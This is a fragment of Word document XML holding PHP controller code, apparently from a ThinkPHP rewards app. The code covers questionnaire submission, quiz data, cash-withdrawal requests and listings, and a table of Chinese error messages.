    </w:p>
    <w:p w14:paraId="256D9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77E49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$data[$k]['data']=json_decode($v['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D4B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E8DD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557730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7C0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diaochaAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EC9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$uid=$this-&gt;member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176EC8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$data=Db::name('diaocha_user')-&gt;where(['uid'=&gt;$uid])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10162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3D5F0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您已经提交过了</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125B9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4610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$data=input('post.data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF638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49F4E4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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E5D6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583A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$data=explode(",",$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C9FD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$count=Db::name('diaocha')-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0165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if($count!=count($data)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AB89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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BC0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4E62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$d=Db::name('diaocha')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C59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$config=config()['renwu'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C5E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$moneyDb=_moneyDb([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0369D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0F6DE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E39C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'jinbi'     =&gt;  $config['diaocha'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED1B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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>问卷调查</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7735EA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6A39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281B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if(!$moneyDb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A383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奖励失败，请联系管理员！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D02C4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2DDC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6061A9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 as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB63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$a[$k]['id'] = $v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EFA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$a[$k]['title'] = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B57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$a[$k]['name'] = $data[$k];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0AB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31E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$db=Db::name("diaocha_user")-&gt;insert(['uid'=&gt;$uid,'time'=&gt;time(),'ip'=&gt;_ip(),'data'=&gt;json_encode($a)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD60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5E1AF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$ret=['ret'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7B5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$ret=['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C65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723B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json_encode($ret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146BF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2C69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datiInfo(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA15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$data=Db::name('dati')-&gt;order("des desc,id asc")-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9DC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4F082E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$data[$k]['data']=json_decode($v['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E0D2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F015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53669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C098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tixian_Ajax(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5194A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$type=input('type/d');      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4E5B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$money=input('money/d');    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F18FB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$wxData=input('wxData');    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6B46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input('user');      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86FE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57D22C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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提现金额</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'         =&gt;      'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FEA2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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提现方式</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'          =&gt;      'require|number|in:1,2',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279D46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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'              =&gt;      'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A326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FE51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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7AC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63685C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35A56B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=&gt;      $user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260925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F232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3185F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json(['err'=&gt;$validate-&gt;getError()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5F1F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48EB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 == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079205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if(!$wxData){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D9A4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请绑定微信账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438DC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61D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D0C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if(!$this-&gt;member['yaoqing']['money'] || $money &gt; $this-&gt;member['yaoqing']['money']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117BA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零钱不足</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB2F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566C9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235127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$ip=_ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5B00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Db::name('member_tixian')-&gt;insert([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D221D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$this-&gt;member['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C54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3C892A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2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751E91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30BB34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18CA1C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=&gt;  $user,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC6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        =&gt;  $ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F3C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'wxData'    =&gt;  $wxData,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7BC7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AF09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提现申请</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380F6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_moneyDb([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4313A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$this-&gt;member['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EAEB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236A0E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$money*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C227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517C5C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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE339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21F6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EF42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t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提现成功，等待审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC864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B8B0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tixian_list(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C6C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54F96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if(input('data/d')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF455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$where['data']=input('data/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216E4F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DE3B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$data=Db::name('member_tixian')-&gt;field('id,money,data,time,type,user,wxData,content,user')-&gt;where($where)-&gt;order('time desc,id desc')-&gt;paginate()-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB050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25FBA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$_data=[0=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',1=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已到账</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',2=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核中</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',3=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>打款中</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',4=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>申请失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436FE0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$data['data'][$k]['data']=$v['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3612B8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$data['data'][$k]['datas']=$_data[$v['data']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0741EE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$data['data'][$k]['time']=date('Y-m-d H:i:s',$v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07702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$data['data'][$k]['times']=date('m-d H:i:s',$v['time']+86400);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B579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if($v['type']==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FEB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$data['data'][$k]['user']=json_decode(htmlspecialchars_decode($v['wxData']),true)['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4FAA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414A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$data['data'][$k]['time']=date('Y-m-d H:i:s',$v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C7B6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unset($data['data'][$k]['wxData']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BFAC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43F7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298DE2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41D0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tixian_view(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF8C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38B9C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4A33C7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3F77E3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62FD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719117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Db::name('member_tixian')-&gt;where($where)-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664B31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$data['times'] = date('Y-m-d H:i:s',$data['time']+86400);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAB32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date('Y-m-d H:i:s',$data['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC29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if($data['type'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52549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 = json_decode(htmlspecialchars_decode($data['wxData']),true)['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381C1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EA0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$data['wxData'] = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745B83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75E01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0A7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C4D2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5FFA6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4BA16C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use think\Controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACAA6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1B6E39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E8E9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@apiDefine MyPages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E7A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pages        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调用显示数量（默认每页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条记录）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19740D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         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求哪一页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142F9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total           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E1A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per_page        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调用显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA61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current_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9930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E64D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header('Access-Control-Allow-Origin:*');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A4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Common extends Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF8C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60BF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$errors = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03128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'200' =&gt; 'Success',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F30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'201' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B36F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'202' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段传值非法</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06543A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'203' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>命名不可重复</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685440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'204' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>原密码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0344C4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'205' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>原密码和新密码不允许相同</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00404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'211' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被访问资源不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C71E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'212' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资源访问受限</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793CD0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'213' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户无权限操作该资源</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0A84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'214' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资源正在审核，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A0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'215' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资源未通过审核，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB3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'216' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章未设置关键字或标签</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCBDA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'221' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该用户不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16924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'222' =&gt; 'Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已过期，请先登录账号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0467E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'223'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21E16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'224'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5ED469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'225' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EF91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'301' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机验证码发送失败</w:t>
